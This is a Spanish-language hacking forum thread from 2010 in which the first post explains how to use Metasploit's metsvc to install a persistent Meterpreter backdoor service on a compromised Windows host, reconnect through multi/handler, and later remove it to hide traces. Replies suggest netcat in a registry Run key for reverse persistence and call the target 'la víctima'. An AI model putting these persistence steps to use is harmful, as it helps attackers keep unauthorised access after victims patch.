Título: [Metasploit] Crear un Backdoor con meterpreter Publicado por: Shell Root en 6 Enero 2010, 04:03 am [Metasploit] Crear un Backdoor con meterpreter Primero, necesitamos una sesión de meterpreter en el sistema remoto. Código: _ Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto. Código: meterpreter > run metsvc Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo. Código: meterpreter > reboot Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar. Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo. Código: msf > use exploit/multi/handler Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades. Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor. Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter. Código: meterpreter > run metsvc -r Y quedará metsvc completamente desinstalado sin perder la sesión que estamos utilizando (Por si cambiamos de idea xD) Un saludo. Fuente: Not Spam http://foro.portalhacker.net/index.php/topic,100609.0.html Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: Masita en 6 Enero 2010, 05:01 am Lo que yo me estaba preguntando es ¿hay un metsvc con conexion inversa? Lo buscaria yo mismo en el Metasploit pero ahora no puedo abrirlo.
Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: kamsky en 6 Enero 2010, 12:57 pm no se si habrá con conexión inversa, supongo que si, pero en caso contrario, puedes hacer todo un poco más "artesanal", y ser tú el que cree la entrada en el registro apuntando a un ejecutable, por ejemplo el netcat, para que cada vez que se reinicie el pc se conecte a donde quieras...
este método está explicado en https://foro.elhacker.net/hacking_basico/mini_howto_usando_meterpreter-t275163.0.html , sólo tienes que amoldarlo para que se comporte como te dije salu2 Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: Masita en 6 Enero 2010, 16:01 pm Gracias por la respuesta Kamsky, comentaba metsvc, por que me devolviese una sesion de Meterpreter en lugar de un CMD.exe, y asi usar las funcionalidades extra que aporta. Si no siempre quedan los metodos tradicionales de nuestra querida navaja suiza. :P
Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: Debci en 7 Enero 2010, 10:20 am Buff no me explota por no sqber que lenguaje usa...
Código: [*] Started bind handler Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: kamsky en 7 Enero 2010, 13:08 pm http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html
Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: Debci en 7 Enero 2010, 20:27 pm http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html Y como se el idioma que es?Saludos Título: Re: [Metasploit] Crear un Backdoor con meterpreter Publicado por: kamsky en 7 Enero 2010, 23:15 pm pues hombre, una forma es "imaginártelo", es decir, sabes de que pais es la víctima?? pues sabiendo eso prueba el idioma natal, y si no es ese pues en el 99% de los casos será inglés o variantes
|